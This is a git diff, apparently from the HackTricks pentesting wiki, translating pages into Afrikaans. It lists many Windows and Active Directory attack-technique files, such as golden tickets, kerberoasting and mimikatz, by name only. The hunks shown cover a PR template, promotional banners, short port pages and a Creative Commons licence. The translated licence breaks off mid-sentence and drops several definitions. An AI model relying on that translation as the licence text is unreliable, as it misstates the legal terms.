| 51 +- .../dsrm-credentials.md | 54 +- ...external-forest-domain-one-way-outbound.md | 74 +- .../external-forest-domain-oneway-inbound.md | 87 +- .../golden-ticket.md | 70 +- .../kerberoast.md | 146 +- .../kerberos-authentication.md | 28 +- .../kerberos-double-hop-problem.md | 102 +- .../active-directory-methodology/laps.md | 77 +- .../over-pass-the-hash-pass-the-key.md | 52 +- .../pass-the-ticket.md | 64 +- .../password-spraying.md | 118 +- .../printers-spooler-service-abuse.md | 104 +- .../printnightmare.md | 26 +- 
.../privileged-groups-and-token-privileges.md | 236 +- .../rdp-sessions-abuse.md | 76 +- .../resource-based-constrained-delegation.md | 156 +- .../security-descriptors.md | 58 +- .../sid-history-injection.md | 86 +- .../silver-ticket.md | 124 +- .../skeleton-key.md | 54 +- .../unconstrained-delegation.md | 76 +- .../authentication-credentials-uac-and-efs.md | 248 +- windows-hardening/av-bypass.md | 593 ++-- windows-hardening/basic-cmd-for-pentesters.md | 1759 ++++++++++- .../basic-powershell-for-pentesters/README.md | 958 +++++- .../powerview.md | 286 +- .../checklist-windows-privilege-escalation.md | 191 +- windows-hardening/lateral-movement/README.md | 34 +- .../lateral-movement/dcom-exec.md | 117 +- windows-hardening/ntlm/README.md | 321 +- windows-hardening/ntlm/atexec.md | 42 +- .../ntlm/places-to-steal-ntlm-creds.md | 32 +- windows-hardening/ntlm/psexec-and-winexec.md | 60 +- windows-hardening/ntlm/smbexec.md | 60 +- windows-hardening/ntlm/winrm.md | 30 +- windows-hardening/ntlm/wmicexec.md | 112 +- .../stealing-credentials/README.md | 302 +- .../stealing-credentials/WTS-Impersonator.md | 96 +- .../credentials-mimikatz.md | 246 +- .../credentials-protections.md | 113 +- .../README.md | 1442 +++++---- .../access-tokens.md | 85 +- .../acls-dacls-sacls-aces.md | 214 +- ...ectory-permission-over-service-registry.md | 54 +- .../com-hijacking.md | 102 +- .../create-msi-with-wix.md | 60 +- .../dll-hijacking.md | 242 +- ...ritable-sys-path-+dll-hijacking-privesc.md | 96 +- .../dpapi-extracting-passwords.md | 93 +- ...igh-integrity-to-system-with-name-pipes.md | 186 +- .../integrity-levels.md | 120 +- .../juicypotato.md | 136 +- .../leaked-handle-exploitation.md | 972 +++---- .../msi-wrapper.md | 34 +- .../named-pipe-client-impersonation.md | 34 +- .../README.md | 173 +- ...vilege-escalation-with-autorun-binaries.md | 192 +- .../roguepotato-and-printspoofer.md | 95 +- .../sedebug-+-seimpersonate-copy-token.md | 333 ++- .../seimpersonate-from-high-to-system.md | 296 +- 
.../windows-c-payloads.md | 52 +- .../uac-user-account-control.md | 213 +- 726 files changed, 75997 insertions(+), 65033 deletions(-) diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md index 252293216..63b22e7f8 100644 --- a/.github/pull_request_template.md +++ b/.github/pull_request_template.md @@ -1,4 +1,4 @@ -## Attribution -We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or have explicit permission to use from the original author. Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone. +## Toewysing +Ons waardeer jou kennis en moedig jou aan om inhoud te deel. Maak asseblief seker dat jy slegs inhoud oplaai wat jy besit of uitdruklike toestemming het van die oorspronklike skrywer om dit te gebruik. Jou respek vir intellektuele eiendomsregte bevorder 'n betroubare en wettige deelomgewing vir almal. -Thank you for contributing to HackTricks! +Dankie dat jy bydra tot HackTricks! diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 8a0fcba10..e5261bf1f 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -1,53 +1,27 @@ -# 1911 - Pentesting fox +# 1911 - Pentesting vos
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-And more services: +En meer dienste: -ubiquiti-discover udp "Ubiquiti Networks Device" +ubiquiti-ontdek udp "Ubiquiti Networks-toestel" -dht udp "DHT Nodes" +dht udp "DHT-nodes" 5060 udp sip "SIP/" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) - -InfluxDB - -![](<.gitbook/assets/image (337).png>) - -![](<.gitbook/assets/image (338).png>) - -![](<.gitbook/assets/image (339).png>) - -![](<.gitbook/assets/image (340).png>) - -![](<.gitbook/assets/image (341).png>) - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) ( diff --git a/6881-udp-pentesting-bittorrent.md b/6881-udp-pentesting-bittorrent.md index cfeec6e71..caf81cda1 100644 --- a/6881-udp-pentesting-bittorrent.md +++ b/6881-udp-pentesting-bittorrent.md @@ -1,16 +1,14 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
@@ -19,16 +17,14 @@ Other ways to support HackTricks:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/LICENSE.md b/LICENSE.md index 3ed5e8e8d..0af37d01d 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -1,204 +1,151 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Creative Commons License
Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on HACK TRICKS by Carlos Polop is licensed under the Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0). +Creative Commons License
Kopiereg © Carlos Polop 2021. Behalwe waar anders gespesifiseer (die eksterne inligting wat in die boek gekopieer is, behoort aan die oorspronklike outeurs), is die teks op HACK TRICKS deur Carlos Polop gelisensieer onder die Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0). -License: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)
-Human Readable License: https://creativecommons.org/licenses/by-nc/4.0/
-Complete Legal Terms: https://creativecommons.org/licenses/by-nc/4.0/legalcode
-Formatting: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
+Lisensie: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)
+Mensleesbare Lisensie: https://creativecommons.org/licenses/by-nc/4.0/
+Volledige Regsterme: https://creativecommons.org/licenses/by-nc/4.0/legalcode
+Formattering: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
-# creative commons +# kreatiewe gemeenskap # Attribution-NonCommercial 4.0 International -Creative Commons Corporation (“Creative Commons”) is not a law firm and does not provide legal services or legal advice. Distribution of Creative Commons public licenses does not create a lawyer-client or other relationship. Creative Commons makes its licenses and related information available on an “as-is” basis. Creative Commons gives no warranties regarding its licenses, any material licensed under their terms and conditions, or any related information. Creative Commons disclaims all liability for damages resulting from their use to the fullest extent possible. +Creative Commons Corporation ("Creative Commons") is nie 'n regspraktyk nie en verskaf nie regsadvies of regsdiens nie. Verspreiding van Creative Commons openbare lisensies skep nie 'n regsverhouding tussen regspraktisyn en kliënt of enige ander verhouding nie. Creative Commons maak sy lisensies en verwante inligting beskikbaar "soos dit is". Creative Commons gee geen waarborge met betrekking tot sy lisensies, enige materiaal wat onder die voorwaardes daarvan gelisensieer is, of enige verwante inligting nie. Creative Commons verwerp alle aanspreeklikheid vir skade wat voortspruit uit die gebruik daarvan tot die volle omvang moontlik. -## Using Creative Commons Public Licenses +## Gebruik van Creative Commons Openbare Lisensies -Creative Commons public licenses provide a standard set of terms and conditions that creators and other rights holders may use to share original works of authorship and other material subject to copyright and certain other rights specified in the public license below. The following considerations are for informational purposes only, are not exhaustive, and do not form part of our licenses. 
+Creative Commons openbare lisensies bied 'n standaardstel voorwaardes wat skeppers en ander reghebbendes kan gebruik om oorspronklike werke van outeurskap en ander materiaal wat onderhewig is aan kopiereg en sekere ander regte soos gespesifiseer in die openbare lisensie hieronder, te deel. Die volgende oorwegings is slegs vir inligtingsdoeleindes, is nie uitputtend nie, en vorm nie deel van ons lisensies nie. -* __Considerations for licensors:__ Our public licenses are intended for use by those authorized to give the public permission to use material in ways otherwise restricted by copyright and certain other rights. Our licenses are irrevocable. Licensors should read and understand the terms and conditions of the license they choose before applying it. Licensors should also secure all rights necessary before applying our licenses so that the public can reuse the material as expected. Licensors should clearly mark any material not subject to the license. This includes other CC-licensed material, or material used under an exception or limitation to copyright. [More considerations for licensors](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). +* __Oorwegings vir lisensiegevers:__ Ons openbare lisensies is bedoel vir gebruik deur diegene wat gemagtig is om die publiek toestemming te gee om materiaal op maniere te gebruik wat andersins deur kopiereg en sekere ander regte beperk word. Ons lisensies is onherroeplik. Lisensiegevers moet die terme en voorwaardes van die lisensie wat hulle kies, lees en verstaan voordat hulle dit toepas. Lisensiegevers moet ook alle regte verseker voordat hulle ons lisensies toepas, sodat die publiek die materiaal kan hergebruik soos verwag. Lisensiegevers moet enige materiaal wat nie onderhewig is aan die lisensie nie, duidelik merk. Dit sluit ander CC-gelisensieerde materiaal in, of materiaal wat onder 'n uitsondering of beperking tot kopiereg gebruik word. 
[Meer oorwegings vir lisensiegevers](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). -* __Considerations for the public:__ By using one of our public licenses, a licensor grants the public permission to use the licensed material under specified terms and conditions. If the licensor’s permission is not necessary for any reason–for example, because of any applicable exception or limitation to copyright–then that use is not regulated by the license. Our licenses grant only permissions under copyright and certain other rights that a licensor has authority to grant. Use of the licensed material may still be restricted for other reasons, including because others have copyright or other rights in the material. A licensor may make special requests, such as asking that all changes be marked or described. Although not required by our licenses, you are encouraged to respect those requests where reasonable. [More considerations for the public](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). +* __Oorwegings vir die publiek:__ Deur een van ons openbare lisensies te gebruik, gee 'n lisensiegever die publiek toestemming om die gelisensieerde materiaal te gebruik onder gespesifiseerde terme en voorwaardes. As die toestemming van die lisensiegever nie nodig is om enige rede nie – byvoorbeeld as gevolg van enige toepaslike uitsondering of beperking tot kopiereg – word daardie gebruik nie deur die lisensie gereguleer nie. Ons lisensies verleen slegs toestemmings onder kopiereg en sekere ander regte waaroor 'n lisensiegever magtig is om toestemming te gee. Die gebruik van die gelisensieerde materiaal kan nog steeds beperk word om ander redes, insluitend omdat ander kopiereg of ander regte in die materiaal het. 'n Lisensiegever mag spesiale versoeke maak, soos om te vra dat alle veranderinge gemerk of beskryf word. 
Alhoewel dit nie deur ons lisensies vereis word nie, word jy aangemoedig om daardie versoeke te respekteer waar dit redelik is. [Meer oorwegings vir die publiek](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). -# Creative Commons Attribution-NonCommercial 4.0 International Public License +# Creative Commons Attribution-NonCommercial 4.0 International Openbare Lisensie -By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-NonCommercial 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions. +Deur die Gelisensieerde Regte (hieronder gedefinieer) uit te oefen, aanvaar en stem jy in om gebonde te wees aan die terme en voorwaardes van hierdie Creative Commons Attribution-NonCommercial 4.0 International Openbare Lisensie ("Openbare Lisensie"). Vir sover hierdie Openbare Lisensie as 'n kontrak geïnterpreteer kan word, word die Gelisensieerde Regte aan jou verleen in oorweging van jou aanvaarding van hierdie terme en voorwaardes, en die Lisensiegever verleen jou sulke regte in oorweging van die voordele wat die Lisensiegever ontvang deur die Gelisensieerde Materiaal beskikbaar te stel onder hierdie terme en voorwaardes. -## Section 1 – Definitions. +## Artikel 1 – Definisies. -a. 
__Adapted Material__ means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed Material and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner requiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where the Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the Licensed Material is synched in timed relation with a moving image. +a. __Aangepaste Materiaal__ beteken materiaal wat onderhewig is aan Kopiereg en Soortgelyke Regte en wat afgelei is van of gebaseer is op die Gelisensieerde Materiaal en waarin die Gelisensieerde Materiaal vertaal, verander, gereël, verander, of andersins gewysig word op 'n wyse wat toestemming vereis onder die Kopiereg en Soortgelyke Regte wat deur die Lisensiegever gehou word. Vir doeleindes van hierdie Openbare Lisensie word Aangepaste Materiaal altyd geproduseer waar die Gelisensieerde Materiaal gesinkroniseer word met 'n bewegende beeld. -b. __Adapter's License__ means the license You apply to Your Copyright and Similar Rights in Your contributions to Adapted Material in accordance with the terms and conditions of this Public License. +b. __Lisensie van die Aanpasser__ beteken die lisensie wat jy toepas op jou Kopiereg en Soortgelyke Regte in jou bydraes tot Aangepaste Materiaal in ooreenstem +## Artikel 2 - Omvang. -c. __Copyright and Similar Rights__ means copyright and/or similar rights closely related to copyright including, without limitation, performance, broadcast, sound recording, and Sui Generis Database Rights, without regard to how the rights are labeled or categorized. For purposes of this Public License, the rights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights. +a. ___Lisensieverlening.___ -d. 
__Effective Technological Measures__ means those measures that, in the absence of proper authority, may not be circumvented under laws fulfilling obligations under Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996, and/or similar international agreements. +1. Onderworpe aan die bepalings en voorwaardes van hierdie Openbare Lisensie, verleen die Lisensiehouer hiermee aan U 'n wêreldwye, vry van lisensiefooi, nie-onderlisensieerbare, nie-uitsluitlike, onherroeplike lisensie om die Gelisensieerde Regte in die Gelisensieerde Materiaal uit te oefen om: -e. __Exceptions and Limitations__ means fair use, fair dealing, and/or any other exception or limitation to Copyright and Similar Rights that applies to Your use of the Licensed Material. +A. die Gelisensieerde Materiaal, geheel of gedeeltelik, vir nie-kommersiële doeleindes slegs te verveelvoudig en te deel; en -f. __Licensed Material__ means the artistic or literary work, database, or other material to which the Licensor applied this Public License. +B. Aangepaste Materiaal te produseer, te verveelvoudig en te deel vir nie-kommersiële doeleindes slegs. -g. __Licensed Rights__ means the rights granted to You subject to the terms and conditions of this Public License, which are limited to all Copyright and Similar Rights that apply to Your use of the Licensed Material and that the Licensor has authority to license. +2. __Uitsonderings en Beperkings.__ Vir die vermyding van twyfel, waar Uitsonderings en Beperkings van toepassing is op U gebruik, is hierdie Openbare Lisensie nie van toepassing nie, en U hoef nie aan sy bepalings en voorwaardes te voldoen nie. -h. __Licensor__ means the individual(s) or entity(ies) granting rights under this Public License. +3. __Termyn.__ Die termyn van hierdie Openbare Lisensie word gespesifiseer in Artikel 6(a). -i. __NonCommercial__ means not primarily intended for or directed towards commercial advantage or monetary compensation. 
For purposes of this Public License, the exchange of the Licensed Material for other material subject to Copyright and Similar Rights by digital file-sharing or similar means is NonCommercial provided there is no payment of monetary compensation in connection with the exchange. +4. __Media en formate; tegniese wysigings toegelaat.__ Die Lisensiehouer gee U toestemming om die Gelisensieerde Regte in alle media en formate uit te oefen, hetsy nou bekend of hierna geskep, en om tegniese wysigings te maak wat nodig is om dit te doen. Die Lisensiehouer doen afstand van en/of stem daarmee saam om enige reg of gesag te ontken om U te verbied om tegniese wysigings te maak wat nodig is om die Gelisensieerde Regte uit te oefen, insluitend tegniese wysigings wat nodig is om Effektiewe Tegnologiese Maatreëls te omseil. Vir doeleindes van hierdie Openbare Lisensie, produseer die eenvoudige maak van wysigings wat deur hierdie Artikel 2(a)(4) gemagtig word nooit Aangepaste Materiaal nie. -j. __Share__ means to provide material to the public by any means or process that requires permission under the Licensed Rights, such as reproduction, public display, public performance, distribution, dissemination, communication, or importation, and to make material available to the public including in ways that members of the public may access the material from a place and at a time individually chosen by them. +5. __Ontvangers van stroomaf.__ -k. __Sui Generis Database Rights__ means rights other than copyright resulting from Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, as amended and/or succeeded, as well as other essentially equivalent rights anywhere in the world. +A. 
__Aanbod van die Lisensiehouer - Gelisensieerde Materiaal.__ Elke ontvanger van die Gelisensieerde Materiaal ontvang outomaties 'n aanbod van die Lisensiehouer om die Gelisensieerde Regte uit te oefen onder die bepalings en voorwaardes van hierdie Openbare Lisensie. -l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning. +B. __Geen stroomafbeperkings nie.__ U mag geen addisionele of verskillende terme of voorwaardes aanbied of opleg op die Gelisensieerde Materiaal nie, as dit die uitoefening van die Gelisensieerde Regte deur enige ontvanger van die Gelisensieerde Materiaal beperk nie. -## Section 2 – Scope. +6. __Geen goedkeuring.__ Niks in hierdie Openbare Lisensie stel of mag beskou word as toestemming om te beweer of te impliseer dat U, of dat U gebruik van die Gelisensieerde Materiaal, verband hou met, of gesponsoreer, ondersteun, of amptelike status verleen deur, die Lisensiehouer of ander persone wat aangewys is om erkenning te ontvang soos voorsien in Artikel 3(a)(1)(A)(i). -a. ___License grant.___ +b. ___Ander regte.___ - 1. Subject to the terms and conditions of this Public License, the Licensor hereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive, irrevocable license to exercise the Licensed Rights in the Licensed Material to: +1. Morele regte, soos die reg op integriteit, word nie onder hierdie Openbare Lisensie gelisensieer nie, en ook nie publisiteit, privaatheid, en/of ander soortgelyke persoonlikheidsregte nie; egter, vir sover moontlik, doen die Lisensiehouer afstand van en/of stem daarmee saam om enige sulke regte wat deur die Lisensiehouer gehou word, tot die beperkte mate wat nodig is om U in staat te stel om die Gelisensieerde Regte uit te oefen, maar andersins nie. - A. reproduce and Share the Licensed Material, in whole or in part, for NonCommercial purposes only; and +2. 
Patent- en handelsmerkregte word nie onder hierdie Openbare Lisensie gelisensieer nie. - B. produce, reproduce, and Share Adapted Material for NonCommercial purposes only. +3. Vir sover moontlik, doen die Lisensiehouer afstand van enige reg om koninklike te erf van U vir die uitoefening van die Gelisensieerde Regte, hetsy direk of deur 'n inwinninggenootskap onder enige vrywillige of afstanddoenbare statutêre of verpligte lisensiëringskema. In alle ander gevalle behou die Lisensiehouer uitdruklik enige reg voor om sulke koninklike in te samel, insluitend wanneer die Gelisensieerde Materiaal gebruik word vir nie-kommersiële doeleindes nie. - 2. __Exceptions and Limitations.__ For the avoidance of doubt, where Exceptions and Limitations apply to Your use, this Public License does not apply, and You do not need to comply with its terms and conditions. - - 3. __Term.__ The term of this Public License is specified in Section 6(a). +## Artikel 3 - Lisensievoorwaardes. - 4. __Media and formats; technical modifications allowed.__ The Licensor authorizes You to exercise the Licensed Rights in all media and formats whether now known or hereafter created, and to make technical modifications necessary to do so. The Licensor waives and/or agrees not to assert any right or authority to forbid You from making technical modifications necessary to exercise the Licensed Rights, including technical modifications necessary to circumvent Effective Technological Measures. For purposes of this Public License, simply making modifications authorized by this Section 2(a)(4) never produces Adapted Material. - - 5. __Downstream recipients.__ +U uitoefening van die Gelisensieerde Regte is uitdruklik onderhewig aan die volgende voorwaardes. - A. __Offer from the Licensor – Licensed Material.__ Every recipient of the Licensed Material automatically receives an offer from the Licensor to exercise the Licensed Rights under the terms and conditions of this Public License. +a. 
___Toekennings.___ - B. __No downstream restrictions.__ You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, the Licensed Material if doing so restricts exercise of the Licensed Rights by any recipient of the Licensed Material. +1. As U die Gelisensieerde Materiaal deel (insluitend in gewysigde vorm), moet U: - 6. __No endorsement.__ Nothing in this Public License constitutes or may be construed as permission to assert or imply that You are, or that Your use of the Licensed Material is, connected with, or sponsored, endorsed, or granted official status by, the Licensor or others designated to receive attribution as provided in Section 3(a)(1)(A)(i). - -b. ___Other rights.___ +A. die volgende behou as dit deur die Lisensiehouer saam met die Gelisensieerde Materiaal voorsien word: - 1. Moral rights, such as the right of integrity, are not licensed under this Public License, nor are publicity, privacy, and/or other similar personality rights; however, to the extent possible, the Licensor waives and/or agrees not to assert any such rights held by the Licensor to the limited extent necessary to allow You to exercise the Licensed Rights, but not otherwise. +i. identifikasie van die skepper(s) van die Gelisensieerde Materiaal en enige ander persone wat aangewys is om erkenning te ontvang, op enige redelike wyse wat deur die Lisensiehouer versoek word (insluitend deur skuilnaam as dit aangewys word); - 2. Patent and trademark rights are not licensed under this Public License. +ii. 'n kopieregkennisgewing; - 3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. 
In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes. - -## Section 3 – License Conditions. +iii. 'n kennisgewing wat na hierdie Openbare Lisensie verwys; -Your exercise of the Licensed Rights is expressly made subject to the following conditions. +iv. 'n kennisgewing wat na die vrywaring van waarborge verwys; -a. ___Attribution.___ +v. 'n URI of skakel na die Gelisensieerde Materiaal, vir sover dit redelik uitvoerbaar is; - 1. If You Share the Licensed Material (including in modified form), You must: +B. aandui of U die Gelisensieerde Materiaal gewysig het en 'n aanduiding van enige vorige wysigings behou; en - A. retain the following if it is supplied by the Licensor with the Licensed Material: +C. aandui dat die Gelisensieerde Materiaal gelisensieer is onder hierdie Openbare Lisensie, en die teks van, of die URI of skakel na, hierdie Openbare Lisensie insluit. - i. identification of the creator(s) of the Licensed Material and any others designated to receive attribution, in any reasonable manner requested 